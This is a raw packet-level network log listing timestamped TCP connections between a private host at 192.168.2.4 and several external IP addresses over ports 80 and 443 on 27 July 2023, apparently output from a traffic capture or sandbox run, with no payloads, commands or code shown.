Jul 27, 2023 20:18:57.672959089 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.672990084 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.673105001 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.708470106 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.708590984 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.724886894 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.724931002 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.779849052 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.779889107 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.780031919 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.938743114 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:57.938852072 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:57.938977003 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:57.942538977 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:57.942619085 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.114183903 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.114401102 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.119443893 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.119478941 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.119837999 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.258002996 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.305445910 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.348289013 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380068064 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380103111 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380110979 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380179882 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380290985 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.380315065 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.380335093 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.452090979 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.452132940 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.452172041 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.452200890 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.452224970 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.452244997 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.453063011 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453094959 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453123093 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453171968 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.453188896 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453207970 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.453470945 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453500986 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453525066 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453583956 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.453583956 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.453602076 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.453618050 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.523783922 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.523814917 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.523871899 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.523900032 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.523920059 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530464888 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530505896 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530549049 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530560970 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530582905 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530600071 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530621052 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530781031 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530802965 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530847073 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530853033 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530869007 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.530884981 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.530915022 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.531039953 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531094074 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531100035 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.531116009 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531151056 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.531239986 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531308889 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.531316042 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531797886 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.531889915 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.531907082 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.595263958 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.595388889 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.595417023 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.601191998 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.601210117 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.601250887 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.601296902 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.601325989 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.601342916 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.602544069 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.602560043 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.602669001 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.602689028 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.602956057 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.602968931 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603010893 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.603024006 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603060007 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.603275061 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603323936 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603334904 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.603346109 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603374958 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.603761911 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.603820086 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.603832960 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.604192019 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.604252100 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.604276896 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.604643106 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.604731083 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.604744911 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605062008 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605120897 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.605129957 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605567932 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605624914 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.605642080 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605905056 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.605962038 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.605969906 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.606592894 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.606661081 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.606677055 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.606808901 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.606863976 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.606870890 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.648663998 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.648691893 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.666814089 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.666903973 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.666950941 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.666974068 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.666990995 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.667263985 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.667289972 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.667337894 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.667346001 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.667361021 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.672811031 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.672944069 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.672986031 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.673012972 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.674109936 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.674330950 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.674351931 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.674427986 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.674506903 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.674516916 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.674979925 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.675051928 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.675137997 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.675156116 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.675263882 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.675343037 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.675350904 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.675739050 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.676151991 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.676170111 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.676362991 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.676459074 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.676471949 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677109003 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677396059 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.677414894 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677457094 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677546024 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.677566051 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677637100 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.677753925 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.677763939 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678055048 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678143978 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678210974 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678277016 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678342104 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.678359985 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678380966 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.678407907 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.678435087 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.679151058 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.679172993 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:58.679198027 CEST	49691	443	192.168.2.4	213.6.54.58
Jul 27, 2023 20:18:58.679204941 CEST	443	49691	213.6.54.58	192.168.2.4
Jul 27, 2023 20:18:59.003813028 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:59.020382881 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:59.020495892 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:59.131172895 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.147527933 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.147660017 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.147994995 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.148032904 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.164155006 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.164203882 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.258651018 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.258690119 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.258802891 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.322776079 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.322839022 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.339027882 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.339057922 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.392049074 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.392124891 CEST	80	49692	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:59.392245054 CEST	49692	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:59.469398022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.492566109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.492688894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.492974043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.515491962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.515531063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.515554905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.515578985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.515616894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.515638113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.520072937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520112038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520138025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520160913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520184994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520203114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.520230055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.520291090 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.520313025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520539999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.520613909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.538145065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.538182974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.538202047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.538235903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.538333893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.538378000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.542529106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542563915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542582989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542604923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542639971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542653084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.542665958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.542684078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542702913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.542716026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.542735100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.560811043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.560890913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.564935923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.564970016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565026999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.565058947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565126896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565146923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565165043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565182924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565193892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.565212965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565227032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.565239906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565258026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565268040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.565284967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565304041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565321922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.565330982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.565346003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.584302902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.584340096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.584358931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.584377050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.584461927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.584502935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.587872028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587902069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587923050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587940931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587959051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587976933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.587991953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588013887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588022947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588044882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588049889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588068962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588087082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588105917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588118076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588133097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588144064 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588159084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588176966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588196039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588210106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588222027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588234901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588248014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588278055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588294983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588314056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588323116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588340998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588359118 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588366985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588381052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588397980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.588408947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.588443995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.607908964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.607949972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.607973099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.607991934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608010054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608027935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608046055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608063936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608078957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.608102083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608119965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.608146906 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.611673117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611702919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611726999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611752987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611779928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611793995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.611824036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611838102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.611861944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611881018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611898899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.611941099 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.611960888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612044096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612133026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612157106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612181902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612193108 CEST	80	49693	45.9.74.80	192.168.2.4
